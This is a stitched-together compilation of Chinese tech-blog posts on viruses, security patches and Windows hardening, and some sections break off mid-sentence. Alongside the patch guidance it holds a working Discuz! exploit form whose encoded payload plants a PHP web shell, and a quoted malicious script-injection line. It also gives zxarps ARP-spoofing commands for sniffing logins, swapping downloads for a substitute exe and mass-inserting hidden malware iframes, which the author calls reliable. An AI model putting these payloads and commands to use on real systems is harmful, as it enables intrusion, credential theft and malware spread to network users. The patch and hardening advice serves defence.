金山安全专家指出，用户电脑出现comres.dll找不到，应用程序无法运行时，可能同时伴随QQ号被盗的情况，可立即使用金山网盾进行修复。金山安全专家同时建议用户应在杀毒后，立即修改QQ登录密码，QQ群管理员应立即删除群共享空间出现的可疑文件，将上传可疑文件的被盗QQ号清理出群，避免病毒进一步扩散。

PS：这病毒真是稀奇古怪，，这么具有“诱惑”性，，金山毒霸云安全中心监测到的数据表明，利用QQ群共享传播类似病毒的报告，自8月1日以来，已累计超过10万次。
相关链接：
群共享“女人必看”传病毒 一周入侵10万用户 http://www.duba.net/zt/news/2010081001.shtml

受影响操作系统环境：Platform: Windows 和 Macintosh

描述：Adobe Illustrator是一款adobe公司最新出品的矢量图编辑软件。
Windows和Macintosh平台上的Adobe Illustrator CS4 (14.0.0)和Adobe Illustrator CS3 (13.0.3和之前版本)存在一个严重漏洞，允许攻击者以应用程序权限执行任意指令。（The vulnerabilities could lead to arbitrary code execution. ）

解决办法：Adobe已经提供了升级补丁

1、如果正在运行Illustrator CS4，请先退出。
2、打开Illustrator CS4的安装目录并备份 < 安装路径>\Adobe Illustrator CS4\Support Files\Contents\Windows\MPS.dll
3、下载补丁文件（http://download.macromedia.com/pub/security/bulletins/apsb10-01/win/APSB10_01_CS4_Win.zip），解压。
4、替换步骤2中的文件 MPS.dll < 安装路径>\Adobe Illustrator CS4\Support Files\Contents\Windows\
5. 删除 Illustrator 用户配置文件
Windows XP: {drive}\Documents and Settings\{user}\Application Data\Adobe\Adobe Illustrator CS4 Settings\
Windows Vista: {drive}\Users\{user}\AppData\Roaming\Adobe\Adobe Illustrator CS4 Settings\
6、 运行 Illustrator CS4

打补丁参考：http://www.adobe.com/support/security/bulletins/apsb10-01.html

PS：前些天打算亲自动手做Logo，就装了这个，今天为这个不常用的家伙打安全更新补丁！

Related posts:

• 配置 yum 为 Fedora 11 快速更新软件
• 又一下载YouTube视频利器FLVPlay
• 安全引用Flash视频，allownetworking=”internal” 参数的应用
• 快速(Vista)右键菜单清理“多余”选项
• WordPress < 2.8.1 Security Bypass 0day

涉及版本
Discuz! 7.1 , Discuz! 7.2
Discuz! 重要安全补丁 20100110 For Discuz! 7.1 Discuz! 7.2

本补丁包只适用于 UCenter Home 2.0 正式版
UCHome 2.0 正式版 20100106补丁包

从sebug获知，discuz 1.0最近爆出一个跨站漏洞和一个注入漏洞，另外从群里获知dz7.1和7.2存在“php远程执行代码”漏洞（上边的补丁包中已经修复）。uchome在特定php环境配置（register_globals为on）下存在一个注入漏洞。

Discuz! 7.1 & 7.2 远程代码执行漏洞细节
Discuz！新版本7.1与7.2版本中的include目录global.func.php中的showmessage函数内eval执行的参数($scriptlang)未初始化，可以任意提交，从而可以执行任意PHP命令。另外misc.php中showmessage使用的$response没有初始化可以作为一个利用点。

漏洞利用原理
showmessage函数里$vars = explode(‘:’, $message);然后message可以自己控制，于是就很容易了，参数是两个自定义的数组。

简单的检测是否漏洞存在
注册一个用户登陆,然后提交
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

漏洞分析参考：Discuz! 7.1 & 7.2 远程代码执行漏洞

补充HTML测试代码：

<form method=”post” action=”http://bbs.XXXX.com/misc.php” enctype=”multipart/form-data”>
帖子ID，指定一个存在的帖子即可：<input type=”text” name=”tid” value=”1″ />
<input type=”hidden” name=”action” value=”imme_binding” />
<input type=”hidden” name=”response[result]” value=”1:2″ />
<input type=”hidden” name=”scriptlang[1][2]” value=”${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}” />
<input type=”submit” name=”topicsubmit” value=”提交” />
</form>

forumdata/cache/usergroup_01.php cmd 生成的一句话

第一个，内容为
杂碎1：借助Browser Defender查看邻居是否危险

Browser Defender™ – Report for clin003.com
Browser Defender evaluates web sites for malicious downloads, exploits, phishing , annoyances such as excessive pop-ups, and other fraudulent practices.

点进去一看，原来是PCtools的Browser Defender对这个博客的检测结果页面，很好，很安全。:)

We have assessed this site and in our view it is safe to visit.

值得提出的是她可以帮忙查看从我这个博客出去的链接（大多为友情链接）是否都是安全的！

Online affiliations for clin003.com
Our testing of this site found no dangerous offsite links.
Links to other sites
Loading…
Analysis URL
…

还好有一个被警告（非友情链接，这说明Browser Defender给出的报告包括但不局限于友情链接，啰嗦！）之外其他都是安全和未知的。

最后看下Browser Defender的英文说明来

Browser Defender is a utility which protects your computer by providing you with an informative and helpful assessment of websites and the possible dangers they pose, thereby allowing you to make better informed choices when you browse the Internet.

A simple green, red or yellow rating lets you know immediately if, in ThreatExpert’s opinion, the website is safe to visit, harmful or needs to be visited with caution. If the website is not amongst our millions of crawled domains, then a grey rating will be shown. If you wish to submit a site to be assessed you can do so from the Browser Defender website.

另外还有针对Firefox的插件Toolbar可以使用
Browser Defender Toolbar

当然从官方网站也能直接下到用于ie的“插件”Toolbar。

第二封邮件，内容为
杂碎1：借助BackType来追踪个人在开放博客空间的评论

Comments by clin003.com — BackType
Comments by clin003.com on Lin’s空间|Only, Ericulous – WordPress Themes, Plugins , Tips and Tricks and more.

进去后发现，大眼一看，这个地址全是抓取的这个博客的留言（feed）（非全部）！一下还没看出啥名堂来，首页的PR为5！

没错，是用来跟踪留言评论的，方便在任何开放评论的网站跟踪自己留下的评论（相当于自己的评论中心），还是来看看他的英文介绍吧

BackType is a service that lets you find, follow and share comments from across the web. Whenever you fill out the “Website” or “URL” field in a comment form when you publish a comment on a blog or other website, BackType attributes it to you. We give comment authors a profile featuring all the comments they’ve written on the Internet. If you don’t have a website to use when you fill out comment forms, sign up and use one of ours.

偶英文不好，就不来翻译啦。
跟踪的评论的“唯一性”有可能是根据留下的“用户名”和“网址”来判断的。

我不知道http://www.backtype.com/url/clin003.com 这个链接从她的主页上是怎么进去的，但通过这个链接演化一下把后边的地址改成“Dianso”在我博客留言使用的网址的话，发现能够看到“Dianso”在别的空间的留言内容（哇哈哈，发现新大陆啦）。
这样看来是非常方便自己追踪自己在开放博客或者空间的留言记录啦 。真是个不错的东东，可惜英文的，对中文博客的跟踪即时性要缺失很多啦（看到她的首页的留言追踪记录在几分钟内）。

理想情况：这样似乎就不用担心自己在任何一个博客的评论分散问题啦。

Related posts:

• Filefox Offline Mode（火狐的脱机模式）
• firefox 3 beta 5发布
• 设置默认浏览器
• 让网站快速支持多国语言
• Gmail安全链接

恭喜您，您QQ号码[*******]已经正式获得第二代密码保护！马上到这里体验新的保护功能吧！
。。。

不容易啊，而且这次申请还不到一星期就ok啦（以前都是3个月的观察期！！，而且结果都是没通过考验，第二代密码保护申请失败）！

关于QQ的其他链接：

QQ异常通知 http://yichang.qq.com/
QQ帐号服务中心 https://account.qq.com/
腾讯客服 http://service.qq.com/

Related posts:

• 今日杂碎：感谢QQ工作人员人工审核空间日志
• 今日杂碎：Service Unavailable
• Google Page Creator 服务迁移
• Splinter(Gtalk)的免费网络电话
• 谷歌跳转到香港，Google中文搜索正式退出中国大陆

这次出问题的又是Wap字符转换问题，看来这个wap鸡肋可以去掉了，看官方给出的安全补丁公告：

http://www.discuz.net/thread-1113736-1-1.html

经查，Discuz! wap 功能部分在对文字进行编码转换时，存在合法变量被恶意覆盖问题，此问题将可能导致您的论坛受到安全性威胁。为此我们强烈建议您立即下载补丁进行修补。

* 此补丁包中含有 Discuz! 各版本程序，解开压缩包后，请根据您的版本号更新

* 本次修正不包含 Discuz! 7.0 测试版，建议参与测试的站点暂时关闭wap功能

* 如果您由于某种原因，无法及时修补，请您暂时关闭 “wap” 功能

据了解，是被修改了  menu.js

document.writeln(“<script language=javascript src=http:\/ \/www.54zc.cn\/17aq\/a.js><\/script>”)

在某网站统计服务网站查看，截止11月17日中午，受害人数已达34713人。

下午四点左右，Discuz官方康盛技术支持提供了Disucz！安全补丁

Comments

• November 18, 2008, uusee网络电视 writes: 下午我的一个网站才更新了补丁...好像很严重一样...

Related posts:

• 使用Discuz插件的同学需要注意了
• Discuz! X1: “内部错误，无法显示此内容” 的纠结问题【附参考解决办法】
• 完美解决Discuz官方国庆模板页头广告错位方法
• Discuz! 与 UCHome 2.0 重要安全补丁20100110(06)
• Discuz 论坛中的 AdSense 显示问题终于解决啦

Server服务在默认情况下都是自动运行的，而Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞，远程攻击者可以通过发送恶意的RPC请求触发这个溢出，导致完全入侵用户系统，以SYSTEM权限执行任意指令。

但是在公司若不是特别情况我想管理员都会把“Server和Computer Browser服务”这禁掉的（局域网文件共享需要的），网吧就可能有点不同啦，因为需要共享？需要开启这个，而因为这个漏洞引入一只蠕虫，那整个网络就不要想安宁啦，一点都不逊于ARP攻击！！

需要说明的是：对于Windows 2000、XP和Server 2003，无需认证便可以利用这个漏洞；对于Windows Vista和Server 2008，可能需要进行认证。
目前这个漏洞正在被名为TrojanSpy:Win32/Gimmiv.A和TrojanSpy:Win32/Gimmiv.A.dll的木马积极的利用。网上已出现了利用该漏洞的蠕虫病毒(Win32/MS08067.gen!A)。据360安全专家分析，这一漏洞的危害极为严重，黑客仅根据IP地址便可随意发起攻击，简直是“指哪打哪”，而且感染性非常强，只要远程执行一段下载恶意程序的代码，不但能随意弹出广告、盗取用户账号，还可以控制本机进而攻击其他用户，使破坏力持续放大，局域网的用户一旦有一个中招病毒就会迅速扩散。被认为是微软近一年半以来首次打破每月定期安全公告的惯例而发布更新。

解决办法1：

微软官方补丁下载地址：

PoC已经被发布，请大家尽快转告安装补丁。我们已经看到大陆地区访问Update的客户端数量有少量减少，不过现在告诉所有人“请恢复启用Windows Automatic Update安装MS08-067，这么做不会下载正版验证WGA”，就像说“这狗不咬人”一样。所以下面把补丁的链接地址直接贴出，方便有所顾虑的用户尽快安装，谢谢！

中文版的MS08-067补丁: 
Windows XP 安全更新程序 (KB958644) 
Windows 2000 安全更新程序 (KB958644) 
Windows Server 2003 安全更新程序 (KB958644)

英文版的MS08-067补丁：

Microsoft Windows 2000 Service Pack 4 
Windows XP Service Pack 2 
Windows XP Service Pack 3 
Windows XP Professional x64 Edition 
Windows XP Professional x64 Edition Service Pack 2 
Windows Server 2003 Service Pack 1 
Windows Server 2003 Service Pack 2 
Windows Server 2003 x64 Edition 
Windows Server 2003 x64 Edition Service Pack 2 
Windows Server 2003 with SP1 for Itanium-based Systems 
Windows Server 2003 with SP2 for Itanium-based Systems 
Windows Vista and Windows Vista Service Pack 1 
Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1 
Windows Server 2008 for 32-bit Systems 
Windows Server 2008 for x64-based Systems 
Windows Server 2008 for Itanium-based Systems

解决办法2：

禁用Server和Computer Browser服务。

在Windows Vista和Windows Server 2008上，阻断受影响的RPC标识符。在命令提示符中运行以下命令：
    
    netsh
    
然后在netsh环境中输入以下命令：

    netsh>rpc
    netsh rpc>filter
    netsh rpc filter>add rule layer=um actiontype=block
    netsh rpc filter>add condition field=if_uuid matchtype=equal data=4b324fc8-1670-01d3-1278-5a47bf6ee188
    netsh rpc filter>add filter
    netsh rpc filter>quit

在防火墙阻断TCP 139和445端口。
使用个人防火墙，如Internet连接防火墙。

黑客眼中的MS08-067

First Glimpse into MS08-067 Exploits In The Wild 

On closer analysis, Spy-Agent.da.dll seeks out potentially vulnerable Windows machines in the local network, and sends maliciously crafted DCERPC requests to exploit the Server Service (SvrSvc).

When successful, hardcoded shellcode embedded within the malware, is executed on the targeted machines to download Spy-Agent.da (or possibly other variants or files) from a web server hosted in Japan.

Just hours following the patch release, public source code has already been seen distributing on the Internet. What more can I say ? Patch your systems ! Yes, NOW !

Spy-Agent.da and Spy-Agent.da.dll are now detected using the current 5414 DATs. SeeDave’s blog for McAfee’s coverage.

MS08-067, How great it is!

Actually, This is not a stack overflow, but a stack overrun vulnerability. 

There are two copies, the first copy is OK, but when there is another ”..\”, it will lead to start the another copy (repeat the first copy codes), the second copy firstly does not calculate the base pointer correctly (firstly it is basePointer-2, so the ’JZ’ checking in the loop of searching character ’\' will never come ture), that lead to get an unexpected stack pointer which is below the base pointer, after the wrong calculation, it starts the second copy and uses the unexpected pointer as the first parameter of function ”wcscpy()”, therefore, the wrong-calculation memory will be rewritten. The EIP will be controlled in the main function, probably.

 
MS Windows Server Service Code Execution PoC (MS08-067)
 
So play around a bit, you’ll get it working reliably…

 
Tracking MS08-067
While we haven’t seen widespread exploitation of this issue, there have been reports of a certain file, “n2.exe,” being downloaded on compromised computers. This file copies another piece of malicious code onto the compromised computer. Symantec products already detect both of these files as Infostealer.
 

引用大牛蛙的话：做盗版的“受害者”好过做盗贼的受害者，看黑色桌面好过让黑客看到你的桌面。

十月紧急额外安全公告

下图是SWI给出的各平台受MS08-067的影响图中文版，请参考。

微软发布额外安全更新MS08-067-紧急(更新补丁下载地址)

http://blog.duba.net/read.php?27

前些天微软的“黑屏”验证计划真是闹得肥肥羊羊，真比微软做广告推广来的容易多啦，话说大陆大半个天都是微软的啦，oO，正版验证也好，黑屏也好，只要微软不使诈，就不会中招的啦，想必也不会对大多数人造成伤害，哈哈哈:P 。

另外看到啦个很寒的个评论“微软威胁到了中国的国家安全”，说的不是没有道理，只是，只是政治的事我不懂，也说不清，关于这个评论也不说啥啦，自己掂量吧！！

相关链接：

Microsoft 安全公告 MS08-067

 http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx

Microsoft Windows Server Service RPC Vulnerability

 http://www.us-cert.gov/cas/techalerts/TA08-297A.html

MS08-067 Released

http://blogs.technet.com/msrc/archive/2008/10/23/ms08-067-released.aspx

Windows Server服务RPC请求缓冲区溢出漏洞（MS08-067）

http://www.sebug.net/vulndb/4288/

Why Microsoft’s SDL Missed MS08-067 in their own words

http://www.cgisecurity.org/2008/10/why-microsofts.html

Get Protected, Now!

http://blogs.technet.com/mmpc/archive/2008/10/23/get-protected-now.aspx

MS08-067 and the SDL

http://groups.google.com/group/ph4nt0m/browse_thread/thread/1158015c79b2758d/0561e0a9ec7ec21f?show_docid=0561e0a9ec7ec21f

Related posts:

• 紧急更新至WordPress 2.6.3
• WordPress < 2.8.1 Security Bypass 0day
• 配置 yum 为 Fedora 11 快速更新软件
• 使用Discuz插件的同学需要注意了
• Sun Solaris RPC 服务库 librpcsvc 拒绝服务漏洞

C:\Program Files\Kingsoft\Kingsoft Internet Security 2008>kavdx /help

Kingsoft AntiVirus Scan V3.0     Copyright (c) 1998, 2003 Kingsoft Co., Ltd

Usage:
KAVDX [drive:][path][filename] [{/|-}<switch>[+|-] …]

Switch:          (+|-: Enable|Disable switch)
?|H|Help        – For help
D               – Display default settings
M               – Scan Memory
B               – Scan Boot area
All             – Scan All files
Z               – Scan archived file
S               – Scan Sub directory
HA              – Heuristic Analysis
A{P|C|D|S|Q}    – Automate {Prompt|Clean|Delete|Skip|Quarantine} infected fi
le(s)
BAK             – Backup infected file(s) before clean
Q               – Quarantine infected file(s) before clean
CF{D|S|Q}       – When Clean Failed, {Delete|Skip|Quarantine} infected file(
s)
L<LogName>      – Virus Log with VirusInfoID

Thank you for using KAVScan!

kavdx是金山的杀毒引擎命令可在2000/XP/Vista 的 DOS 窗口下运行，也可以在纯 DOS 环境下运行。

（其他主流杀毒软件也有相应的命令需要的话请自行查看说明文档）

C:\Program Files\Kingsoft\Kingsoft Internet Security 2008>kavdx /m /b d:\tools

Kingsoft AntiVirus Scan V3.0     Copyright (c) 1998, 2003 Kingsoft Co., Ltd

* Loading AntiVirus Engine…Ok
* AntiVirus Engine Version: 2008.1.14.15
* Loading Virus DataBase…OK!
* Virus Database Version: 2008.4.2.10

* Init AntiVirus Engine…Ok

* Scan Windows memory…
OK!
* Scan No.0 hard disk Master Boot Record…Ok!
* Scan D: disk boot sector…Ok!

* Scanning Directiories/Files…

* Checked Files: 8
* No Virus Found!

Thank you for using KAVScan!

上边这个例子就是扫描内存和引导区和d:\tools目录

若不带路径参数将使用默认的参数“/All-”（只扫描程序文件及文档文件）

默认参数是这样的：

C:\Program Files\Kingsoft\Kingsoft Internet Security 2008>kavdx /d

Kingsoft AntiVirus Scan V3.0     Copyright (c) 1998, 2003 Kingsoft Co., Ltd

Default Settings:
/M           : Scan Memory
/B           : Scan Boot area
/All-        : Only Scan program and document file
/Z-          : Disable Scan archived file(s)
/S           : Scan Sub directory
/HA-         : Disable Heuristic Analysis
/AP          : Prompt when found virus
/BAK-        : Disable Backup infected file(s) before clean
/Q-          : Disable Quarantine infected file(s) before clean
/CFS         : When Clean Failed, Skip infected file(s)

Thank you for using KAVScan!

看下中文的说明：

命令行格式：[路径]KAVDX [指定驱动器][指定路径][指定文件] [{/|-}<switch>[+|-] …]
+ 打开设置开关
- 关闭设置开关
无 （[指定驱动器][指定路径][指定文件]）时检查所有本地硬盘

switch（命令行转换参数）
?|H|Help 显示帮助信息
D 显示默认设置
M 扫描内存
B 扫描引导区
All 扫描所有文件
Z 检查压缩文件
ZC 清除压缩文件内文件所染病毒（只支持可清除的压缩格式）
S 扫描子目录
HA 启动启发式查毒
A{P|C|D|S|Q} 发现病毒{询问后处理|自动清除|自动删除|自动跳过|自动隔离}被感染的文件
BAK 清除病毒前备份被感染的文件
CF{D|S|Q} 当清除失败时自动{删除|跳过|隔离}被感染的文件

如果没有选择任何参数，程序会按默认值来进行查毒，默认的设置如下所示：
/M 扫描内存
/B 扫描引导区
/All- 只扫描程序文件及文档文件
/Z- 不扫描压缩文件中的文件
/S 扫描子目录
/HA- 不启动启发式查毒
/AP 发现病毒询问后处理
/BAK- 扫描子目录
HA 清除文件中的病毒时不备份原始的文件

Related posts:

• 病毒分析技术课程PDF版本
• 升级WordPress2.6.2
• 当line-height小于18px时Chrome及webkit核心浏览器渲染问题
• 反击arp病毒攻击
• 预防病毒

4:
Documents and Settings
Program files目录，为Common Files目录之外的所有目录赋予Administrators和SYSTEM有

完全控制权。
5:
at.exe
attrib.exe
cacls.exe
cmd.exe
debug.exe
format.com
ftp.exe
net.exe
net1.exe
netstat.exe
regedt32.exe
telnet.exe
scrrun.dll
shell.dll
拒绝guest用户组访问

iis网站全局配置
。。。
不安全组件：
regsvr32/u C:\WINDOWS\System32\wshom.ocx
rename C:\WINDOWS\System32\wshom.ocx ws.bak.hom.ocx.bak
regsvr32/u C:\WINDOWS\system32\shell32.dll
rename C:\WINDOWS\system32\shell32.dll shell.bak.32.dll

sql扩展存储，php模块

Related posts:

• 配置H3C AR18-21A路由器(Ethernet端口映射与公网域名映射)
• 用telnet检测网址返回的头部信息状态码
• site Logs
• H3C AR18-21A路由器(常用)配置命令
• 某局对谷歌音乐下手啦？

基于ARP欺骗的东东，可网页插马，DNS欺骗，自定义关键字嗅探等

网络地址信息：

0. Realtek RTL8139

IP Address. . . . . : 192.168.1.101

Physical Address. . : 00-11-D8-6B-5E-19

Default Gateway . . : 192.168.1.1

1. WAN (PPP/SLIP) Interface

IP Address. . . . . : xx.xx.xx.xx

Physical Address. . : 00-52-00-00-00-00

Default Gateway . . : xx.xx.xx.xx

options（参数说明）:

-idx [index] 网卡索引号

-ip [ip] 欺骗的IP,用’-'指定范围,’,'隔开

-sethost [ip] 默认是网关,可以指定别的IP

-port [port] 关注的端口,用’-'指定范围,’,'隔开,没指定默认关注所有端口

-reset 恢复目标机的ARP表

-hostname 探测主机时获取主机名信息

-logfilter [string]设置保存数据的条件，必须+-_做前缀,后跟关键字,

‘,’隔开关键字,多个条件’|'隔开

所有带+前缀的关键字都出现的包则写入文件

带-前缀的关键字出现的包不写入文件

带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)

-save_a [filename] 将捕捉到的数据写入文件 ACSII模式

-save_h [filename] HEX模式

-hacksite [ip] 指定要插入代码的站点域名或IP,

多个可用’,'隔开,没指定则影响所有站点

-insert [html code]指定要插入html代码

-postfix [string] 关注的后缀名，只关注HTTP/1.1 302

-hackURL [url] 发现关注的后缀名后修改URL到新的URL

-filename [name] 新URL上有效的资源文件名

-hackdns [string] DNS欺骗，只修改UDP的报文,多个可用’,'隔开

格式: 域名|IP，www.aa.com|222.22.2.2,www.bb.com|1.1.1.1

-Interval [ms] 定时欺骗的时间间隔，默认是3秒

-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者

-speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB

例子代码:

嗅探指定的IP段中端口80的数据，并以HEX模式写入文件

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log

FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件

zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter “_USER ,_PASS” -save_a sniff.log

HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter “+POST ,+user,+pass” -save_a sniff.log

用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探

zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter “+POST ,+user,+pass|_USER ,_PASS” -save_a sniff.log

如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix “.exe,.rar,.zip” -hackurl http://xx.net/ -filename test.exe

指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert “just for fun

arp欺骗批量挂马
zxarps.exe （ARP欺骗tool）

3389 肉鸡一台最好是服务器 或者内网机器命令： zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert “<iframe src=’xx’ width=0 height=0>”
这里网马地址就假设为 http://www.baidu.com/
那么命令就是zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert “<iframe src=’http://www.baidu.com/’ width=0 height=0>”
接着上 3389 服务器 服务器必须安装 winPcap.exe 工具都有打包然后就执行
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert “<iframe src=’http://www.baidu.com/’ width=0 height=0>”
IP 自己改看看效果 ！！！！！ 绝对好用 自己试就知道了 这样挂马可是同网段好几个服务器的站基本都挂上你的马了只要别人访问这IP段中的某一个服务器上的站那么就自动欺骗插入我们的网马代码

防御办法：若为win系统推荐使用360arp防火墙

通用办法：对客户机和网关做双向ip-mac地址绑定，最好使用交换机替代集线器。

Related posts:

• 向访客和爬虫显示不同内容的PHP代码
• mediawiki页面伪静态配置调试
• wordpress文章post中显示tags的办法
• 初体验海内网：海内可以注册啦?
• Discuz 论坛中的 AdSense 显示问题终于解决啦

中国的GSM到底是不是加密的：http://hi.baidu.com/tombkeeper/blog/item/534571d9edcef22811df9bd2.html

手机打电话是可以窃听的?短信也同样？http://hi.baidu.com/tombkeeper/blog/item/49ac4043a14b15159213c636.html

人家移动老总不是说过嘛：“你是谁，你在哪里，我们都知道”。

。。。

Related posts:

• 看到技术文章很稀奇——张翼：跳出PC局限用手机授权防御木马
• Testing phone post
• Gmail要求手机验证怎么办 (国家列表中没有China)
• E2手机病毒?
• 用telnet检测网址返回的头部信息状态码

应该是最近闹得很火的机器狗病毒产生的假冒系统文件.可以直接中止,感染正常的系统文件userinit.exe不修改时间和大小只改文件内容。

usrinit.exe档案

W32.Kedebe.E@mm的一个组件

危害程度：蠕虫复制自身为系统文件夹下的[一个不可打印字符][文件名]，不可打印字符表示为0xA0，在不同操作系统下的显示不同，文件名为如下之一： nbtstat.exe、usrinit.exe、user.exe、winhlp32.exe、telnet.exe、locator.exe、 recover.exe、logman.exe、dlhost.exe、logonui.exe、winspol.exe、services.exe、 svchost.exe、lsas.exe、rundl32.exe、regedt32.exe、winlogon.exe、wuauclt.exe。在 记事本中打开临时文件夹下的[初始文件名].txt文件并显示如下文本：This document cannot be run under older versions. Please install latest version of Notepad. [随机文本]。从带有特定扩展名的文件中收集邮件地址，向收集到的地址发送自身副本。。试图终止带有某些文本的进程并删除相关文件以降低安全设置。向 hosts文件增加条目以阻止对一些与安全相关网站的访问。删除一些安全程序的文件！

阻止usrinit.exe

可以使用机器狗病毒的专杀工具（目前还没发现好用的专杀工具）建议是用免疫工具（超级巡警有个机器狗免疫程序），然后可以建立个开机运行脚本检查进程中是否有usrinit.exe进程，如果有就立即中止。
脚本类似：

wmic process where name=”userinit.exe” call terminate
wmic process where name=”usrinit.exe” call terminate
该代码的的意思是：当发现进程里有userinit.exe时，即关闭；当发现进程里有usrinit.exe时，也关闭。因为批处理在winlogon后运行，所以病毒刚启动，就被杀掉了。这样也就失去了下载其它病毒的机会。不过，缺点是它只运行一次。这两代批处理的基础上，加入了每秒检查进程，一发现即终止的vbs脚本：

do while(1)
strComputer = “.”
Set objWMIService = GetObject(”winmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)

Set colProcessList1 = objWMIService.ExecQuery _
(”Select * from Win32_Process Where Name = ‘userinit.exe’”)
For Each objProcess1 in colProcessList1
objProcess1.Terminate()
Next

Set colProcessList2 = objWMIService.ExecQuery _
(”Select * from Win32_Process Where Name = ‘usrinit.exe’”)
For Each objProcess2 in colProcessList2
objProcess2.Terminate()
Next

Set colProcessList3 = objWMIService.ExecQuery _
(”Select * from Win32_Process Where Name = ‘conime0.exe’”)
For Each objProcess3 in colProcessList3
objProcess3.Terminate()
Next

Wscript.Sleep(1000)
Loop
这段vbs脚本的机制和以上两段代码有异曲同工之妙。不过，用了无限循环语句，实现了对进程的动态监控，使得被监控进程无法运行。

Related posts:

• arp欺骗和机器狗病毒简单免疫批处理脚本(bat)
• 免疫机器狗
• 机器狗

超级巡警干脆让系统死机（关于司机原因目前还不清楚是不是因为超级巡警，由于装拉超级巡警的机子无一例外的死机，到现在还没时间去仔细研究死因。）

这次作的新系统可能没有格盘的原因或这是我激活其他分区的病毒感染程序，刚做完就带病毒（系统看起来没啥问题），这次使用开机运行脚本驻留内存不断循环的查杀userinit.exe和usrinit.exe进程，还有开机就吧网络连接断开（因为linkinfo.dll是个下载者）或者开着360先暂时拦截着他下在其他更多的木马，然后用360修复系统漏洞，最好大全，欧一口气打啦112个漏洞，其中两个是在带有网络连接的安全模式下打的。

然后从下载好压缩包中解压微点主动防御软件装上然后升级重起，然后配置微点，由于批量的电脑等着用这个系统就最好用静默方式处理恶意程序和发现的病毒，并且处在内网，所以绑定拉网关防止arp攻击。

添加信任程序（需要提醒的是对于小的程序并且有压缩包的绿色程序建议重新解压下覆盖已经有的程序，因为这群病毒可能已经感染拉你的可执行程序exe文件）。

如果你不用微点，那么建议你无论如何也要做使用专业的杀软做一次全盘扫描（专业对于360和超级巡警应该不能考虑进来的说！！个人见解他们只是杀毒的辅助工具而已）。

然后该干啥干啥，偶接下来做的是优化系统，根据需要配置系统设置。

然后重起备份系统分区，刻盘测试。。

关于机子死因：

病毒和杀毒软件谁也打不多谁最终系统牺牲。

arp攻击，防arp的软件(360arp防火墙和超级巡警防arp模块)低档不了，这个可能性比较小的说，因为死机期间360发现的arp攻击和超级巡警发现的arp攻击都不多，差不多一个小时就会死掉（鼠标不动,键盘无响应）。

受到网络拒绝服务攻击（感觉这个可能性比较大的说，可以和第一个原因相提并论），所以这次打补丁就特意先打上能够引起拒绝服务攻击的几个不定，具体的漏洞编号不记得啦，大概2007年11月有个tcp协议的漏洞什么的可以造成拒绝服务攻击。

还有原因么想不起来啦，应用程序在受到病毒前一直运行正常没发现过冲突。

硬件上也没发现啥冲突。

死机系统环境：

xp2电脑公司ghost版

克隆卡一个主机三个用户同时用

512和1g的内存

p4 双核3.0cpu和酷睿双核1.6的cpu

80G硬盘

over

最后说句:那病毒如果不把系统搞的死掉我还是会给他留个生存的空间的.前提是保证系统正常稳定的运行被使用.

Related posts:

• 病毒分析技术课程PDF版本
• 今天我让U盘只读不写！
• 从命令行查杀病毒『金山毒霸』
• 安装Ghost系统出现 “unist specified don’t exist. shsucdx can’t install” 解决
• 杀毒软件引擎技术之窥探

当机器狗刚出现时，就有人写出了相应的免疫批处理代码，如下：

md %systemroot%\system32\drivers\pcihdd.sys
cacls %systemroot%\system32\drivers\pcihdd.sys /e /p everyone:n
cacls %systemroot%\system32\userinit.exe /e /p everyone:r
exit
按说，这段代码对于最早的机器狗病毒（10月17日之前）是管用的。机器狗病毒早期的确生成了pcihdd.sys文件.而且还修改了 userinit.exe文件。基于这两点出发，建立一个pcihdd.sys的目录，以及设置userinit.exe的访问权限是管用的。

然而，病毒作者很快发现了这一点。他迅速的在后期的版本中，也加入了批处理的内容。即对以上批处理作了个反向工程，解除设置的权限，删除免疫目录，还是修改userinit.exe文件，达到加载其它病毒木马的目的。
后来，为了防止目录被删掉，有些强人更是出怪招，在pcihdd.sys目录下再建个怪异的目录名，形如”ty…/”的目录。这个目录用批处理是可以建立的，但是不可删除。同样，建了这个目录，pcihdd.sys目录也就不可删除了。
在后期变种中，病毒不再使用pcihdd.sys的这文件为驱动，改成了其他的文件名，比如笔者今天发现的变种，驱动名就是comint32.sys..
